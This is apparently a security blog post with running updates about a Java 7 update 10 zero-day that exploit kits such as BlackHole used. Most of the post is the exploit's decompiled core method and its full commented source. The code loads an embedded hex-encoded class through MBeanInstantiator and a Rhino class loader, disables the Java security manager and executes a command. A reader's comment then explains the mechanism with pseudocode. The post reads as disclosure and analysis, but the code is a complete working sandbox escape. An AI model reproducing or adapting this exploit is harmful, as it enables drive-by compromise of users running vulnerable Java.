According to Kafeine Security a new exploit for Java 7 is in the wild. Not surprisingly this new exploit, announced yesterday on the underweb, comes right after the BlackHole crew announced that their team has been given a budget of 100.000$ to acquire unique web browser exploits. Currently the exploit has been reported to work up to the latest version of Java, that is: Java 1.7.0_10. As usual we suggest to immediately disable java on your browser, since the exploit has got hundreds of thousands of hits in just two days. Currently we don’t have yet a sample to analyze but we’ll publish an update as soon as we’ll be able to gather more information on the topic.
Update 1: according to AlienVault the exploit is highly obfuscated and seems to target security checks as seen last year on CVE-2012-4681. Also the exploit seems to be bundled with Nuclear Pack EK too.
Update 2: the exploit has been fully disclosed, according to Spiderlab the exploit uses a technique similar to CVE-2012-5088 by using java.lang.invoke.MethodHandle.InvokeWithArguments() and taking advantage of the MBeanInstantiator which returns a reference to a restricted class called by a trusted object. The core of the exploit is represented by the following method:
public ewjvaiwebvhtuai124a(String paramString)
throws Throwable
{
try
{
byte[] arrayOfByte = ewjvaiwebvhtuai124f(test.ewjvaiwebvhtuai124a(ewjvaiwebvhtuai124b, "") + test.ewjvaiwebvhtuai124a(ewjvaiwebvhtuai124a, ""));
JmxMBeanServerBuilder localJmxMBeanServerBuilder = new JmxMBeanServerBuilder();
JmxMBeanServer localJmxMBeanServer = (JmxMBeanServer)localJmxMBeanServerBuilder.newMBeanServer("", null, null);
MBeanInstantiator localMBeanInstantiator = localJmxMBeanServer.getMBeanInstantiator();
Class localClass1 = localMBeanInstantiator.findClass(ewjvaiwebvhtuai124c(var_666c[1]), null);
Class localClass2 = localMBeanInstantiator.findClass(ewjvaiwebvhtuai124c(var_666c[5]), null);
MethodHandles.Lookup localLookup = MethodHandles.publicLookup();
MethodType localMethodType1 = MethodType.methodType(MethodHandle.class, Class.class, new Class[] { MethodType.class });
MethodHandle localMethodHandle1 = localLookup.findVirtual(MethodHandles.Lookup.class, ewjvaiwebvhtuai124c(var_666c[3]), localMethodType1);
MethodType localMethodType2 = MethodType.methodType(Void.TYPE);
MethodHandle localMethodHandle2 = (MethodHandle)localMethodHandle1.invokeWithArguments(new Object[] { localLookup, localClass1, localMethodType2 });
Object localObject1 = localMethodHandle2.invokeWithArguments(new Object[0]);
MethodType localMethodType3 = MethodType.methodType(MethodHandle.class, Class.class, new Class[] { String.class, MethodType.class });
MethodHandle localMethodHandle3 = localLookup.findVirtual(MethodHandles.Lookup.class, ewjvaiwebvhtuai124c(var_666c[4]), localMethodType3);
MethodType localMethodType4 = MethodType.methodType(localClass2, ClassLoader.class);
MethodHandle localMethodHandle4 = (MethodHandle)localMethodHandle3.invokeWithArguments(new Object[] { localLookup, localClass1, ewjvaiwebvhtuai124c(var_666c[0]), localMethodType4 });
Object localObject2 = localMethodHandle4.invokeWithArguments(new Object[] { localObject1, null });
MethodType localMethodType5 = MethodType.methodType(Class.class, String.class, new Class[] { [B.class });
MethodHandle localMethodHandle5 = (MethodHandle)localMethodHandle3.invokeWithArguments(new Object[] { localLookup, localClass2, ewjvaiwebvhtuai124c(var_666c[2]), localMethodType5 });
Class localClass3 = (Class)localMethodHandle5.invokeWithArguments(new Object[] { localObject2, null, arrayOfByte });
localClass3.newInstance();
Method localMethod = localClass3.getMethod("r", new Class[] { String.class, Class.class });
localMethod.invoke(null, new Object[] { paramString, hw.class });
}
catch (Exception localException)
{
}
}
Update 3: the following exploit kits are confirmed to use this exploit: BlackHole, Cool EK, Nuclear Pack, RedKit, Sakura
Update 4: Full source code is now publicly available:
/*
Java 0day 1.7.0_10 decrypted source
Originaly placed on https://damagelab.org/index.php?showtopic=23719&st=0
From Russia with love.
*/
import java.lang.invoke.MethodHandle;
import java.lang.invoke.MethodHandles;
import java.lang.invoke.MethodType;
import java.security.AccessController;
import java.security.PrivilegedExceptionAction;
import com.sun.jmx.mbeanserver.JmxMBeanServer;
import com.sun.jmx.mbeanserver.JmxMBeanServerBuilder;
import com.sun.jmx.mbeanserver.MBeanInstantiator;
@SuppressWarnings({ "restriction" })
public class Exploit {
public static byte[] hex2Byte(String paramString) {
byte[] arrayOfByte = new byte[paramString.length() / 2];
for (int i = 0; i < arrayOfByte.length; i++) {
arrayOfByte[i] = (byte) Integer.parseInt(paramString.substring(2 * i, 2 * i + 2), 16);
}
return arrayOfByte;
}
public static byte[] B$class_bytes = hex2Byte("CAFEBABE0000003200270A000500180A0019001A07001B0A001C001D07001E07001F0700200100063C696E69743E010003282956010004436F646501000F4C696E654E756D6265725461626C650100124C6F63616C5661726961626C655461626C65010001650100154C6A6176612F6C616E672F457863657074696F6E3B010004746869730100034C423B01000D537461636B4D61705461626C6507001F07001B01000372756E01001428294C6A6176612F6C616E672F4F626A6563743B01000A536F7572636546696C65010006422E6A6176610C000800090700210C002200230100136A6176612F6C616E672F457863657074696F6E0700240C002500260100106A6176612F6C616E672F4F626A656374010001420100276A6176612F73656375726974792F50726976696C65676564457863657074696F6E416374696F6E01001E6A6176612F73656375726974792F416363657373436F6E74726F6C6C657201000C646F50726976696C6567656401003D284C6A6176612F73656375726974792F50726976696C65676564457863657074696F6E416374696F6E3B294C6A6176612F6C616E672F4F626A6563743B0100106A6176612F6C616E672F53797374656D01001273657453656375726974794D616E6167657201001E284C6A6176612F6C616E672F53656375726974794D616E616765723B295600210006000500010007000000020001000800090001000A0000006C000100020000000E2AB700012AB8000257A700044CB1000100040009000C00030003000B000000120004000000080004000B0009000C000D000D000C000000160002000D0000000D000E00010000000E000F001000000011000000100002FF000C00010700120001070013000001001400150001000A0000003A000200010000000C01B80004BB000559B70001B000000002000B0000000A00020000001000040011000C0000000C00010000000C000F0010000000010016000000020017");
// Decompilation credit to benmmurphy
// http://www.reddit.com/r/netsec/comments/16b4n1/0day_exploit_fo_java_17u10_spotted_in_the_wild/c7ulpd7
// basically, it's this, as if this were compiled and saved on disk.
static class B implements PrivilegedExceptionAction<Object> {
public B() {
try {
AccessController.doPrivileged(this);
} catch (Exception e) {
}
}
public Object run() {
// This basically removes the security manager
System.setSecurityManager(null);
return new Object();
}
}
@SuppressWarnings("rawtypes")
public void init() {
try {
// ================================================================
// STEP 0: get introspection objects
// Conveniences
ClassLoader null_ClassLoader = null;
Object[] _zero_args_ = {};
// "Returns a lookup object which is trusted minimally.
// It can only be used to create method handles to publicly
// accessible fields and methods."
MethodHandles.Lookup lookup = MethodHandles.publicLookup();
// Used to load the "sun.org.mozilla.javascript.internal.*" classes
// Looks like these classes load some normally inaccessible
// libraries. Can't find any good documentation on them.
MBeanInstantiator localMBeanInstantiator = ((JmxMBeanServer) new JmxMBeanServerBuilder().newMBeanServer("",
null, null)).getMBeanInstantiator();
// Used to invoke reflection on the javascript classes
// method type: MethodHandle <method> (Class, String, MethodType)
MethodType mt_MethodHandle__Class_String_MethodType = MethodType.methodType(MethodHandle.class,
Class.class, new Class[] { String.class, MethodType.class });
// MethodHandles.Lookup.findVirtual(Class, String, MethodType)
MethodHandle MethodHandles$Lookup$findVirtual = lookup.findVirtual(MethodHandles.Lookup.class,
"findVirtual", mt_MethodHandle__Class_String_MethodType);
// method type: MethodHandle <method> (Class, MethodType)
MethodType mt_MethodHandle__Class_MethodType = MethodType.methodType(MethodHandle.class, Class.class,
new Class[] { MethodType.class });
// MethodHandles.Lookup.findConstructor(Class, MethodType)
MethodHandle MethodHandles$Lookup$findConstructor = lookup.findVirtual(MethodHandles.Lookup.class,
"findConstructor", mt_MethodHandle__Class_MethodType);
// ================================================================
// STEP 1: Load the GeneratedClassLoader interface that declares a
// public
// "defineClass" method so we can take our bytes and turn it into a
// live Java Class.
Class GeneratedClassLoader$class = localMBeanInstantiator.findClass(
"sun.org.mozilla.javascript.internal.GeneratedClassLoader", null_ClassLoader);
// ================================================================
// STEP 2: Create a Javascript "Context" to get a reference to a
// Javascript GeneratedClassLoader via
// "Context.createClassLoader(ClassLoader)".
Class Context$class = localMBeanInstantiator.findClass("sun.org.mozilla.javascript.internal.Context",
null_ClassLoader);
MethodType mt_Void__Void = MethodType.methodType(Void.TYPE);
MethodHandle Context$Context = (MethodHandle) MethodHandles$Lookup$findConstructor
.invokeWithArguments(new Object[] { lookup, Context$class, mt_Void__Void });
Object jsContext = Context$Context.invokeWithArguments(_zero_args_);
// ================================================================
// STEP 3: Create a GeneratedClassLoader object.
MethodType mt_GeneratedClassLoader__ClassLoader = MethodType.methodType(GeneratedClassLoader$class,
ClassLoader.class);
MethodHandle Context$createClassLoader = (MethodHandle) MethodHandles$Lookup$findVirtual
.invokeWithArguments(new Object[] { lookup, Context$class, "createClassLoader",
mt_GeneratedClassLoader__ClassLoader });
Object generatedClassLoader = Context$createClassLoader
.invokeWithArguments(new Object[] { jsContext, null });
// ================================================================
// STEP 4: Define the class "B" - the bytes "B$class_bytes" is
// basically what you would get "on disk" if you compiled the "B"
// class.
MethodType mt_Class__String_bytearray = MethodType.methodType(Class.class, String.class,
new Class[] { byte[].class });
MethodHandle GeneratedClassLoader$defineClass = (MethodHandle) MethodHandles$Lookup$findVirtual
.invokeWithArguments(new Object[] { lookup, GeneratedClassLoader$class, "defineClass",
mt_Class__String_bytearray });
Class B$class = (Class) GeneratedClassLoader$defineClass.invokeWithArguments(new Object[] {
generatedClassLoader, null, B$class_bytes });
// ================================================================
// STEP 5: Create a new "B" object, which disables the security manager in it's constructor
B$class.newInstance();
// ================================================================
// PROFIT!!!1!
Runtime.getRuntime().exec("calc.exe");
} catch (Throwable ex) {
}
}
}
I think this source is almost old: into Rhinos class of openjdk 7 the method createClassLoader into Context there isn’t, and Context is not into sun.org.mozilla.javascript.internal package.
I’m not sure but the program can disable the security manager with B class in this way:
JMX Server instance a Context with hight jvm privilege,(just like JMX Server?), from Context get a ClassLoader to load B, and B disable SecurityManager.
A pseudo java code:
Object jsContext = JMX.instance(Context.class);
GeneratedClassLoader gcl = jsContext.createClassLoader();
Class B$class = gcl.defineClass(B_Serialized);
B$class.newInstance(); //bye bye security manager!
Methods java source:
[in Context] public GeneratedClassLoader createClassLoader(ClassLoader parent){
ContextFactory f = getFactory();
return f.createClassLoader(parent);
}
createClassLoader(ClassLoader parent)
{
return new DefiningClassLoader(parent);
}
[DefiningClassLoader extends ClassLoader] defineClass:
{
return super.defineClass(name, data, 0, data.length,
SecurityUtilities.getProtectionDomain(getClass()));
}
As you can see into defineClass: the ProtectionDomain of Context,so of MBeanServer, has highter privilege, over that of an applet has into JVM.
Source